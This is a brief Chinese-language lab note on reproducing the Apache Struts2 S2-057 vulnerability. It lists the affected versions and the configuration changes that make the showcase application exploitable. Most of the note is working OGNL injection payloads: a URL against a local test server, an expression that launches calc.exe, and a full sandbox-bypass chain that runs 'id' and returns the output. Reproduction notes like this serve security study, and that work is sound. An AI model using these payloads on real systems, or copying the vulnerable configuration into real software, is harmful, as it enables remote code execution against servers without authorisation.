Struts2 057实验

参考：https://blog.csdn.net/weixin_43625577/article/details/97111575

https://www.sinesafe.com/article/20180823/struts2057.html

受影响的版本是ApacheStruts 2.3–Apache Struts2.3.34、Apache Struts2.5–Apache Struts2.5.16等系列版本

注意事项：

首先在struts.xml配置文件添加<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

其次修改配置文件struts-actionchaining.xml 删掉namespace属性，或使用了通配符*

最后把type="chain"改成type="redirectAction"两个文件都要改

攻击payload: http://192.168.0.127:8080/struts2-showcase/${(1+1)}/actionChain1.action

${#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc.exe')}

${

(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}